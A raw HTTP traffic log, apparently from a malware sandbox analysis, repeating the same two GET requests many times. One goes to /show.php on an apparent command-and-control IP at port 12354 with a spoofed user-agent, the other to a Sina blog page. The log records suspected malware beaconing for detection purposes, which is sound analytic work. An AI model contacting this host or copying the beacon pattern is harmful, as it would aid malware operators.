Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
